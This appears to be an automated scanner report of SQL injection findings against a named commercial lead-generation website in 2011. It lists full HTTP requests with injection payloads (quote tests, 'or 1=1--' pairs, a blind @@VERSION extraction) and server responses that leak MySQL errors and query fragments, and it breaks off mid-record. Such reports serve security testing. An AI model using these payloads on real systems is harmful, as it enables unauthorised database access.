GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure'&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:08:58 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=n3t171g9gb6l1c06u4t80raku6; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '24-hour&attributeId_397=1957__Less than $2,500&attributeId_508[]=3311__ Credit c' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure''&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:08:59 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=bcva6f0asll7rrbu3ov0gqndt4; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>
The attributeId_395 parameter appears to be vulnerable to SQL injection attacks. The payloads 49261789'%20or%201%3d1--%20 and 49261789'%20or%201%3d2--%20 were each submitted in the attributeId_395 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:42:38 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The attributeId_395 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_395 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP'&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:00 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=c3obdd1mi91f9borvl4pao9eb1; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '24-hour&attributeId_397=1957__Less than $2,500&attributeId_508[]=3311__ Credit c' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP''&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:00 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=m0o8prfjppbhu5roatvqpfug56; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The attributeId_396 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_396 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour'&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:00 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=mcvauiobunbnif5cpr0cqo2j35; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'than $2,500&attributeId_508[]=3311__ Credit card processing&button3=Submit&compa' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour''&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:01 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=1p27h2q2cmb4mc421lunvfclr4; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The attributeId_396 parameter appears to be vulnerable to SQL injection attacks. The payloads 14010757'%20or%201%3d1--%20 and 14010757'%20or%201%3d2--%20 were each submitted in the attributeId_396 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:42:48 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The attributeId_397 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_397 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500'&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:01 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=0bt87cpl5h38rikk9q894i5ck0; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailad' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500''&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:09:02 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=krmt4q9euuf149ei3fkrv85ms2; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>
The attributeId_397 parameter appears to be vulnerable to SQL injection attacks. The payloads 13322733'%20or%201%3d1--%20 and 13322733'%20or%201%3d2--%20 were each submitted in the attributeId_397 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:42:59 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The attributeId_508%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_508%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:03 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=v0cfmvtvugo1n1vdbq3c3l6uv0; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... buteId_508[]=3311__ Credit card processing'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing''&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:09:04 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=9e0kgn6h2671ktub60jeck76e2; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>
The attributeId_508%5B%5D parameter appears to be vulnerable to SQL injection attacks. The payloads 12543062'%20or%201%3d1--%20 and 12543062'%20or%201%3d2--%20 were each submitted in the attributeId_508%5B%5D parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:43:09 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=atmdotmcuu41nnmcfoic3k5vm0; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... buteId_508[]=3311__ Credit card processing&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
Request 2
